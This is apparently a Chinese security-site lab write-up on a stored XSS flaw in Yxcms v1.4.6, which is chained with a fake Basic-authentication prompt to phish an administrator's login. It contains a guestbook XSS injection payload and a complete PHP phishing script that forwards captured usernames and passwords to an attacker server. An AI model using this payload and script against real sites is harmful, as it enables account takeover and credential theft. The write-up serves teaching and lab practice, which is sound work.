【XSS专题】利用XSS攻击漏洞配合Basic认证页面钓鱼获取账号密码
文章描述了一次针对Yxcms_v1.4.6的存储型XSS攻击实验。攻击者通过在留言本中注入恶意脚本,成功触发目标网站管理员后台的XSS漏洞。随后利用该漏洞植入Basic认证页面钓鱼载荷,诱使管理员输入账号密码并将其窃取。 2025-4-30 01:47:48 Author: www.freebuf.com(查看原文) 阅读量:11 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻击机器:192.168.5.141(windows 10 + Phpstudy + PHP + Apache + PHP恶意脚本)

目标主机:192.168.5.146(windows 7 + Phpstudy + PHP + Apache + Yxcms_v1.4.6)

思路设想:寻找存储XSS攻击漏洞,构造Basic认证页面钓鱼载荷,通过利用存储XSS攻击漏洞将Basic认证页面钓鱼载荷植入目标网站管理员后台,管理员一旦访问到载荷则触发并弹出Basic认证页面请求管理员认证;一旦管理员输入账号密码,则恶意服务器就会成功接收到账号密码。

一、挖掘XSS攻击漏洞

首页地址:http://www.yxcms_v1.4.6.com/

后台地址:http://www.yxcms_v1.4.6.com/index.php?r=admin/index/login

(1)攻击机器访问网站首页并插入XSS弹窗脚本

1745976906_68117e4aedc4eb3376e36.png!small

1745976914_68117e52ed9df003bbd05.png!small

Burpsuite抓取数据包:

1745976924_68117e5c86cdf4cecc174.png!small

Burpsuite修改数据包:tname[]=pandora<script%26gt;alert("xss")</script%26gt;

1745976934_68117e661bc5fcf3434f1.png!small

Burpsuite放过数据包:

1745976941_68117e6d1a23dde3022cb.png!small

注意:此时,攻击者已成功插入XSS弹窗脚本(盲XSS)。

(2)目标靶机管理员登录后台并查看留言本:http://www.yxcms_v1.4.6.com/index.php?r=admin/index/login

1745976961_68117e812360ef3ddf6d9.png!small

账号密码:admin/123456

1745976971_68117e8b4d519f3b15380.png!small

注意:此时,目标靶机管理员已成功触发XSS弹窗脚本,存在存储(盲打)XSS攻击漏洞。

二、攻击机准备Basic认证页面钓鱼脚本

(1)基本登录认证页面钓鱼代码:auth.php

----------------------------------------------------------------------------------------------------------------------

<?php

error_reporting(0);

if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {

header('Content-type:text/html; charset=utf-8' );

header('WWW-Authenticate: Basic realm="'.addslashes(trim($_GET['info'])).'"');

header('HTTP/1.0 401 Unauthorized');

echo 'Authorization Required.';

exit;

} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){

header("Location: http://192.168.5.141/recode.php?username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}");

}

?>

------------------------------------------------------------------------------------------------------------

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/vuls/429257.html
如有侵权请联系:admin#unsafe.sh